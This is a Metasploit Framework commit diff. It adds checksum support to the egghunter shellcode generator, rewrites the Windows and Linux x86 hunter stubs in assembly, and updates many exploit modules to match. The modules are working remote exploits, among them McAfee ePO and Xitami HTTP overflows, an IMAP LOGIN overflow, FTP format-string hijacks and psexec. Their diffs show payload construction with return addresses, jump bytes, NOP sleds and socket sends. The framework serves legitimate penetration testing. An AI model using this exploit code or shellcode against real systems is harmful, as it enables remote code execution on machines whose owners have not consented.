see #684, adds checksum support, updates modules to use it, fixes some wfs_delay/WfsDelay issues

git-svn-id: file:///home/svn/framework3/trunk@10150 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-08-25 20:55:37 +00:00
parent c473d20927
commit 330281eadd
20 changed files with 303 additions and 109 deletions

View File

@ -1,12 +1,18 @@
# $Id$
require 'rex/exploitation/egghunter'
module Msf
###
#
#
# This mixin provides an interface to generating egghunters for various
# platforms using the Rex::Exploitation::Egghunter class.
#
# Originally written by skape
# BadChar support added by David Rude
# Updated to take the payload and options by Joshua J. Drake
#
###
module Exploit::Egghunter
@ -18,11 +24,11 @@ module Exploit::Egghunter
end
#
#
# Generates an egghunter stub based on the current target's architecture
# and operating system.
#
def generate_egghunter(marker = nil)
def generate_egghunter(payload, badchars = nil, opts = {})
# Prefer the target's platform/architecture information, but use
# the module's if no target specific information exists
los = target_platform
@ -37,18 +43,27 @@ module Exploit::Egghunter
if los.nil?
raise RuntimeError, "No platform restrictions were specified -- cannot select egghunter"
end
badchars ||= payload_badchars
egg = Rex::Exploitation::Egghunter.new(los, larch)
bunny = egg.generate(payload_badchars, marker)
bunny = egg.generate(payload, payload_badchars, opts)
if (bunny.nil?)
print_error("The egghunter could not be generated")
raise ArgumentError
end
return bunny
end
#
# Set the wfs_delay setting for all exploits using the Egghunter
#
def wfs_delay
30
end
end
end

View File

@ -12,6 +12,13 @@ module Exploitation
# overflow occurs, but it's possible to stick a larger payload somewhere else
# in memory that may not be directly predictable.
#
# Original implementation by skape
# (See http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf)
#
# Checksum checking implemented by dijital1/corelanc0d3r
# Checksum code merged to Egghunter by jduck
# Conversion to use Metasm by jduck
#
###
class Egghunter
@ -29,21 +36,51 @@ class Egghunter
#
# The egg hunter stub for win/x86.
#
def hunter_stub
{
'Stub' =>
"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" +
"\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" +
"\x41\x41\x41\x41" +
"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7",
'EggSize' => 4,
'EggOffset' => 0x12
}
def hunter_stub(payload, badchars = '', opts = {})
raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
marker = "0x%x" % opts[:eggtag].unpack('V').first
checksum = checksum_stub(payload, badchars, opts)
assembly = <<EOS
check_readable:
or dx,0xfff
next_addr:
inc edx
push edx
push 0x02 ; use NtAccessCheckAndAuditAlarm syscall
pop eax
int 0x2e
cmp al,5
pop edx
je check_readable
check_for_tag:
; check that the tag matches once
mov eax,#{marker}
mov edi,edx
scasd
jne next_addr
; it must match a second time too
scasd
jne next_addr
; check the checksum if the feature is enabled
#{checksum}
; jump to the payload
jmp edi
EOS
assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
# return the stub
assembled_code
end
end
end
###
#
# Linux-based egghunters
@ -58,16 +95,46 @@ class Egghunter
#
# The egg hunter stub for linux/x86.
#
def hunter_stub
{
'Stub' =>
"\xfc\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80" +
"\x3c\xf2\x74\xf1\xb8" +
"\x41\x41\x41\x41" +
"\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7",
'EggSize' => 4,
'EggOffset' => 0x11
}
def hunter_stub(payload, badchars = '', opts = {})
raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
marker = "0x%x" % opts[:eggtag].unpack('V').first
checksum = checksum_stub(payload, badchars, opts)
assembly = <<EOS
cld
check_readable:
or cx,0xfff
next_addr:
inc ecx
push 0x43 ; use 'sigaction' syscall
pop eax
int 0x80
cmp al,0xf2
je check_readable
check_for_tag:
; check that the tag matches once
mov eax,#{marker}
mov edi,ecx
scasd
jne next_addr
; it must match a second time too
scasd
jne next_addr
; check the checksum if the feature is enabled
#{checksum}
; jump to the payload
jmp edi
EOS
assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
# return the stub
assembled_code
end
end
@ -88,7 +155,7 @@ class Egghunter
Egghunter.constants.each { |c|
mod = self.class.const_get(c)
next if ((!mod.kind_of?(::Module)) or
next if ((!mod.kind_of?(::Module)) or
(!mod.const_defined?('Alias')))
if (platform =~ /#{mod.const_get('Alias')}/i)
@ -98,7 +165,7 @@ class Egghunter
mod.constants.each { |a|
amod = mod.const_get(a)
next if ((!amod.kind_of?(::Module)) or
next if ((!amod.kind_of?(::Module)) or
(!amod.const_defined?('Alias')))
if (arch =~ /#{mod.const_get(a).const_get('Alias')}/i)
@ -115,21 +182,29 @@ class Egghunter
#
# This method generates an egghunter using the derived hunter stub.
#
def generate(badchars = '', marker = nil)
return nil if ((opts = hunter_stub) == nil)
def generate(payload, badchars = '', opts = {})
# set defaults if options are missing
stub = opts['Stub'].dup
esize = opts['EggSize']
eoff = opts['EggOffset']
# NOTE: there is no guarantee this won't exist in memory, even when doubled.
# To address this, use the checksum feature :)
opts[:eggtag] ||= Rex::Text.rand_text(4, badchars)
egg = marker
# NOTE: there is no guarentee this wont exist in memory, even when doubled
egg ||= Rex::Text.rand_text(esize, badchars)
raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if egg.length != esize
# Generate the hunter_stub portion
return nil if ((hunter = hunter_stub(payload, badchars, opts)) == nil)
stub[eoff, esize] = egg
# Generate the marker bits to be prefixed to the real payload
egg = ''
egg << opts[:eggtag] * 2
egg << payload
if opts[:checksum]
cksum = 0
payload.each_byte { |b|
cksum += b
}
egg << [cksum & 0xff].pack('C')
end
return [ stub, egg ]
return [ hunter, egg ]
end
protected
@ -138,7 +213,35 @@ protected
# Stub method that is meant to be overridden. It returns the raw stub that
# should be used as the egghunter.
#
def hunter_stub
def hunter_stub(payload, badchars = '', opts = {})
end
def checksum_stub(payload, badchars = '', opts = {})
return '' if not opts[:checksum]
if payload.length < 0x100
cmp_reg = "cl"
elsif payload.length < 0x10000
cmp_reg = "cx"
else
raise RuntimeError, "Payload too big!"
end
egg_size = "0x%x" % payload.length
checksum = <<EOS
push ecx
xor ecx,ecx
xor eax,eax
calc_chksum_loop:
add al,byte [edi+ecx]
inc ecx
cmp #{cmp_reg},#{egg_size}
jnz calc_chksum_loop
test_chksum:
cmp al,byte [edi+ecx]
pop ecx
jnz next_addr
EOS
end
end

View File

@ -66,7 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
hunter = generate_egghunter
hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
egg = hunter[1]
connect_udp
@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
select(nil,nil,nil,0.5)
print_status("Sending payload")
udp_sock.put(pkt1 + egg + egg + payload.encoded)
udp_sock.put(pkt1 + egg)
select(nil,nil,nil,0.5)
print_status("Calling overflow trigger")

View File

@ -0,0 +1,97 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'Internal Egghunter Test Exploit',
'Description' =>
"This module tests the exploitation of a test service using the Egghunter.",
'Author' => 'jduck',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'Arch' => ARCH_X86,
'Payload' =>
{
'Space' => 1000,
'MaxNops' => 0,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'DefaultTarget' => 0))
register_options(
[
OptBool.new('WaitForInput', [ false, "Wait for user input before returning from exploit", false ])
])
end
def autofilter
false
end
def check
return Exploit::CheckCode::Vulnerable
end
def exploit
connect
print_status("Sending #{payload.encoded.length} byte payload...")
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, {
:checksum => true
})
print_status("Egghunter: hunter stub #{eh_stub.length} bytes, egg #{eh_egg.length} bytes")
sploit = ''
# break before?
#sploit << "\xcc"
sploit << eh_stub
# just return otherwise
sploit << "\xc3"
# hopefully we find this!
sploit << eh_egg
sock.put(sploit)
if (datastore['WaitForInput'])
puts "Type something..."
gets
end
handler
end
end

View File

@ -45,7 +45,7 @@ class Metasploit3 < Msf::Exploit::Remote
},
'DefaultOptions' =>
{
'WfsDelay' => 30,
'WfsDelay' => 30
},
'Platform' => 'php',
'Arch' => ARCH_PHP,

View File

@ -96,12 +96,12 @@ class Metasploit3 < Msf::Exploit::Remote
# Pack the values
ret = [ ret ].pack('V')
clean = [ clean ].pack('V')
hunter = generate_egghunter()
hunter = generate_egghunter(p.encoded, payload_badchars, { :checksum => true })
egg = hunter[1]
# Now, build out the HTTP response payload
content =
"<html>" + egg + egg + p.encoded + "\n" +
"<html>" + egg + "\n" +
"<object type=\"////////////////////////////////////////////////////////////////" +
rand_text_alphanumeric(8) + ret + clean +
make_nops(8) + hunter[0] + "\">" +

View File

@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
# use the egghunter!
eh_stub, eh_egg = generate_egghunter
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
off = target['Offset']
idxf = ""
@ -79,8 +79,7 @@ class Metasploit3 < Msf::Exploit::Remote
sploit << "\r\n"
sploit << "[FILES]\r\n"
sploit << "\r\n"
sploit << eh_egg * 2
sploit << payload.encoded
sploit << eh_egg
hhp = sploit

View File

@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
# use the egghunter!
eh_stub, eh_egg = generate_egghunter
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
off = target['Offset']
idxf = ""
@ -78,8 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
sploit << "\r\n"
sploit << "[FILES]\r\n"
sploit << "\r\n"
sploit << eh_egg * 2
sploit << payload.encoded
sploit << eh_egg
hhp = sploit

View File

@ -15,7 +15,6 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,
@ -64,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
# use the egghunter!
eh_stub, eh_egg = generate_egghunter
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
off = target['Offset']
idxf = ""
@ -79,8 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
sploit << "\r\n"
sploit << "[FILES]\r\n"
sploit << "\r\n"
sploit << eh_egg * 2
sploit << payload.encoded
sploit << eh_egg
hhp = sploit

View File

@ -186,7 +186,7 @@ For now, that will have to be done manually.
# use the egghunter!
eh_stub, eh_egg = generate_egghunter
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
# write shellcode to 'writable' (all at once)
fmtbuf = generate_fmtstr_from_buf(num_start, mytarget['Writable'], eh_stub, mytarget)
@ -201,8 +201,7 @@ For now, that will have to be done manually.
fmtbuf = generate_fmt_two_shorts(num_start, mytarget['FlowHook'], mytarget['Writable'], mytarget)
# add payload to the end
fmtbuf << eh_egg * 2
fmtbuf << payload.encoded
fmtbuf << eh_egg
print_status(" hijacker format string buffer is #{fmtbuf.length} bytes")
if (res = send_cmd(['PWD', fmtbuf ], true))
print_status(res.strip)

View File

@ -15,7 +15,6 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
@ -136,7 +135,6 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
# generate_egghunter
connect_login
print_status("Trying target #{target.name}...")

View File

@ -194,7 +194,7 @@ For now, that will have to be done manually.
num_start = ip_length + 2 + 29 + 3 + 3 + 2
# use the egghunter!
eh_stub, eh_egg = generate_egghunter
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
# write shellcode to 'writable' (all at once)
fmtbuf = generate_fmtstr_from_buf(num_start, mytarget['Writable'], eh_stub, mytarget)
@ -207,8 +207,7 @@ For now, that will have to be done manually.
# NOTE: the resulting two writes must be done at the same time
fmtbuf = generate_fmt_two_shorts(num_start, mytarget['FlowHook'], mytarget['Writable'], mytarget)
# add payload to the end
fmtbuf << eh_egg * 2
fmtbuf << payload.encoded
fmtbuf << eh_egg
fmtbuf = '/' + fmtbuf.gsub(/%/, '%25').gsub(/ /, '%20')
print_status(" hijacker format string buffer is #{fmtbuf.length} bytes")

View File

@ -21,20 +21,19 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'McAfee ePolicy Orchestrator / ProtectionPilot Overflow',
'Description' => %q{
This is an exploit for the McAfee HTTP Server (NAISERV.exe).
This is an exploit for the McAfee HTTP Server (NAISERV.exe).
McAfee ePolicy Orchestrator 2.5.1 <= 3.5.0 and ProtectionPilot 1.1.0 are
known to be vulnerable. By sending a large 'Source' header, the stack can
be overwritten. This module is based on the exploit by xbxice and muts.
Due to size constraints, this module uses the Egghunter technique. You may
wish to adjust WfsDelay appropriately.
Due to size constraints, this module uses the Egghunter technique.
},
'Author' =>
[
'muts <muts [at] remote-exploit.org>',
'xbxice[at]yahoo.com',
'hdm',
'patrick' # MSF3 rewrite, ePO v2.5.1 target
],
[
'muts <muts [at] remote-exploit.org>',
'xbxice[at]yahoo.com',
'hdm',
'patrick' # MSF3 rewrite, ePO v2.5.1 target
],
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
@ -82,14 +81,14 @@ class Metasploit3 < Msf::Exploit::Remote
if (banner =~ /Spipe\/1.0/)
return Exploit::CheckCode::Appears
end
return Exploit::CheckCode::Safe
return Exploit::CheckCode::Safe
end
def exploit
connect
hunter = generate_egghunter
egg = hunter[1]
hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
egg = hunter[1]
sploit = Rex::Text::rand_text_alphanumeric(92)
sploit << Rex::Arch::X86.jmp_short(6)
@ -97,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote
sploit << [target['Ret']].pack('V')
sploit << hunter[0]
content = egg + egg + payload.encoded
content = egg
request = "GET /spipe/pkg HTTP/1.0\r\n"
request << "User-Agent: Mozilla/4.0 (compatible; SPIPE/1.0\r\n"
@ -113,8 +112,5 @@ class Metasploit3 < Msf::Exploit::Remote
handler
end
def wfs_delay
25
end
end

View File

@ -26,7 +26,7 @@ class Metasploit3 < Msf::Exploit::Remote
Xitami Web Server. If a malicious user sends an If-Modified-Since
header containing an overly long string, it may be possible to
execute a payload remotely. Due to size constraints, this module uses
the Egghunter technique. You may wish to adjust WfsDelay appropriately.
the Egghunter technique.
},
'Author' => 'patrick',
'License' => MSF_LICENSE,
@ -80,11 +80,11 @@ class Metasploit3 < Msf::Exploit::Remote
def exploit
connect
hunter = generate_egghunter
hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
egg = hunter[1]
sploit = "GET / HTTP/1.1\r\n"
sploit << "Host: " + egg + egg + payload.encoded + "\r\n"
sploit << "Host: " + egg + "\r\n"
sploit << "If-Modified-Since: " + Rex::Arch::X86.jmp_short(3) + ", "
sploit << hunter[0] + rand_text_alphanumeric(target['Offset']) + target['Ret']

View File

@ -62,10 +62,10 @@ class Metasploit3 < Msf::Exploit::Remote
connect
sock.get_once
hunter = generate_egghunter()
hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
egg = hunter[1]
sploit = "A001 LOGIN " + egg + egg + payload.encoded + hunter[0]
sploit = "A001 LOGIN " + egg + hunter[0]
sploit << [target.ret].pack('V') + [0xe9, -175].pack('CV')
print_status("Trying target #{target.name}...")

View File

@ -13,7 +13,6 @@ class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::TcpServer
include Msf::Exploit::Egghunter
def initialize(info = {})
super(update_info(info,

View File

@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote
magic_packet << "\x02\x01\x00\x01\x04\x00\x74\x65\x73\x74\x03\x01\x00\x11\x3c\x00"
# Unleash the Egghunter!
eh_stub, eh_egg = generate_egghunter
eh_stub, eh_egg = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
sploit = magic_packet
sploit << rand_text_alpha_upper(119)
@ -80,8 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
sploit << make_nops(10)
sploit << eh_stub
sploit << make_nops(50)
sploit << eh_egg * 2
sploit << payload.encoded
sploit << eh_egg
print_status("Trying target #{target.name}...")
sock.put(sploit)
@ -90,7 +89,4 @@ class Metasploit3 < Msf::Exploit::Remote
disconnect
end
def wfs_delay
25
end
end

View File

@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
print_status("Trying target #{target.name}...")
# Generate the egghunter payload
hunter = generate_egghunter()
hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
egg = hunter[1]
# Pick a "filler" character that we know doesn't get mangled
@ -98,8 +98,6 @@ class Metasploit3 < Msf::Exploit::Remote
eggdata =
fil * 1024 +
egg +
egg +
payload.encoded +
fil * 1024
# Place the egghunter where ESI happens to point

View File

@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
# [out] handle
# Generate the egghunter payload
hunter = generate_egghunter()
hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
egg = hunter[1]
#print_status("Today, we'll be hunting for 0x#{egg.unpack("V")[0]}")
@ -86,8 +86,6 @@ class Metasploit3 < Msf::Exploit::Remote
eggdata =
rand_text(1024) +
egg +
egg +
payload.encoded +
rand_text(1024)
buflen = 295

View File

@ -37,14 +37,14 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Microsoft Windows Authenticated User Code Execution',
'Description' => %q{
This module uses a valid administrator username and password (or
password hash) to execute an arbitrary payload. This module is similar
to the "psexec" utility provided by SysInternals. Unfortunately, this
module is not able to clean up after itself. The service and payload
file listed in the output will need to be manually removed after access
has been gained. The service created by this tool uses a randomly chosen
name and description, so the services list can become cluttered after
repeated exploitation.
This module uses a valid administrator username and password (or
password hash) to execute an arbitrary payload. This module is similar
to the "psexec" utility provided by SysInternals. Unfortunately, this
module is not able to clean up after itself. The service and payload
file listed in the output will need to be manually removed after access
has been gained. The service created by this tool uses a randomly chosen
name and description, so the services list can become cluttered after
repeated exploitation.
},
'Author' =>
[
@ -55,6 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Privileged' => true,
'DefaultOptions' =>
{
'WfsDelay' => 10,
'EXITFUNC' => 'process'
},
'References' =>
@ -67,7 +68,6 @@ class Metasploit3 < Msf::Exploit::Remote
{
'Space' => 2048,
'DisableNops' => true,
'WfsDelay' => 10,
'StackAdjustment' => -3500
},
'Platform' => 'win',